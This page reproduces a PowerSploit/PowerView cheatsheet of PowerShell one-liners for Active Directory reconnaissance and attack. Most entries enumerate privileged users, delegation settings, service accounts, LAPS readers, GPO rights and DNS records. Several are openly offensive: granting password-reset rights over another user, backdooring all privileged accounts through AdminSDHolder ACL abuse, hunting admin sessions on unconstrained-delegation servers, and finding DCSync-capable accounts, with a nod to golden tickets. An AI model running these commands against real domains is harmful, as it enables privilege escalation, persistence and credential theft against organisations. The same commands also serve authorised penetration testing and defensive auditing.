Skip to content

Powersploit

Powersploit/PowerView

Powersploit cheatsheet

PowerView

Get all the groups a user is effectively a member of, 'recursing up':

Get-NetGroup -UserName <USER>

Get all the effective members of a group, 'recursing down':

Get-NetGroupMember -GoupName <GROUP> -Recurse

Get the effective set of users who can administer a server:

Get-NetLocalGroup -Recurse SERVER.domain.local

Retrieve all the computers a GPP password applies to:

Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }

Get all users with passwords changed > 1 year ago:

$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"

All enabled users:

Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"

All disabled users:

Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"

All users that require smart card authentication:

Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"

All users that don't require smart card authentication:

Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"

Enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation:

$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount

Enumerate servers that allow unconstrained kerberos delegation and show all users logged in:

Invoke-UserHunter -Unconstrained -ShowAll

Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation:

Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation

Get the logged on users for all machines in any server OU in a particular domain:

Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}}

Find all users with an SPN set (likely service accounts):

Get-NetUser -SPN

Find all service accounts in "Domain Admins":

Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}

Hunt for all privileged users (adminCount=1):

Invoke-UserHunter -AdminCount

Find users with sidHistory set:

Get-NetUser -Filter '(sidHistory=*)'

Enumerate all global catalogs in the forest:

Get-NetForestCatalog

Turn a list of computer short names to FQDNs:

gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"}

Find interesting .vbs/.bat/.ps1 scripts on domain controllers:

Invoke-FileFinder -SearchSYSVol

Enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through:

$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess

Enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default:

$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
$DcPolicy.PrivilegeRights

Enumerate what machines that a particular group has local admin rights to:

Find-GPOLocation -GroupName <GROUP>

Enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC:

Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP

Export a csv of all GPO mappings:

Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

Use alternate credentials for searching for files on the domain:

$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential

Enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names:

Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs

Grant user 'will' the rights to change 'matt's password:

Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword

Audit the permissions of AdminSDHolder, resolving GUIDs:

Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs

Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All

Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCsync):

Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

Find linked DA accounts using name correlation:

Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname

Save a PowerView object to disk for later usage:

Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out

Find any machine accounts in privileged groups:

Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Enumerate permissions for GPOs where users have some kind of modify rights:

Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}

Find all policies applied to a current machine:

Get-NetGPO -ComputerName WINDOWS1.testlab.local

Find the user/groups that have read access to the LAPS password property for a specified computer:

Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |
    Select-Object -ExpandProperty distinguishedname |
    ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {
        Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
    } | Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        Convert-NameToSid $_.IdentityReference
    } | Select-Object -ExpandProperty SID | Get-ADObject

Get the ACLs for all OUs where someone is allowed to read the LAPS password attribute:

Get-NetOU -FullData | 
    Get-ObjectAcl -ResolveGUIDs | 
    Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
        $_
    }

Perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv:

Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv

Return all universal security groups in a forest with foreign members:

Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object {
    $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
    $_.Member = $_.Member | ForEach-Object {
        $MemberDomain = $_.subString($_.IndexOf("DC="))
        if($GroupDomain -ne $MemberDomain) {
            $_
        }
    }
    $_
} | Where-Object {$_.Member}